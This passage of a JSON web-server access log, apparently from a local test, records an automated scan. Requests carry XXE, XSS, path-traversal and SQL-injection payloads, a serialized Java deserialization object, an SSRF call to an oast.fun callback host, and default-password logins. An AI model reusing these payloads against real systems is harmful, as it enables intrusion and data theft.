"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A]>\x0D\x0A\x0D\x0A&xxe;\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lumis/portal/controller/xml/PageControllerXml.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\x22onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v3/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/__swagger__/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0ArO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\x0D\x0AgetUnsavedChanges\x0D\x0ArO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAKmNhMjg1dG9zbXB2YmFmcWcwN2gwZTZka211cGcxam10ZC5vYXN0LmZ1bnQAAHEAfgAFdAAFaHR0cHNweHQAGWh0dHBzOi8vdGVzdC5qZXhib3NzLmluZm94\x0D\x0ArO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"j_username=admin&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22methodInput\x22:[{\x22type\x22:\x22ClusterComputeResource\x22,\x22value\x22: null,\x22serverGuid\x22: null}]}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/_swagger_/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=admin&password=admin&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"j_username=app&j_password=passw0rd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hue&password=hue&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"j_username=mqadmin&j_password=mqadmin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ibmmq/console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1/ibmmq/console/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"https://example.com", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::1]' UNION SELECT '/","request":"GET /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hadoop&password=hadoop&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/java.lang:type=Memory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer/send_email?to=NzAA@cfQq&url=http://ca285tosmpvbafqg07h01wjq35f1ewk7e.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fpui/loginServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=cloudera&password=cloudera&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/webapp/login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /puppet-ca/v1/certificate_request/29KAXxsAPBrklYx3jY2wZYrmBxq HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"j_username=admin&j_password=password","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pentaho/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:36 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema 